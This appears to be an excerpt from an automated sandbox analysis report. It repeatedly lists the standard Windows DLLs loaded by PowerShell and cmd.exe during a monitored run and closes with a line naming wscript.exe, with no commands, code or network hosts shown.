Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll

Source: C:\Windows\System32\wscript.exe

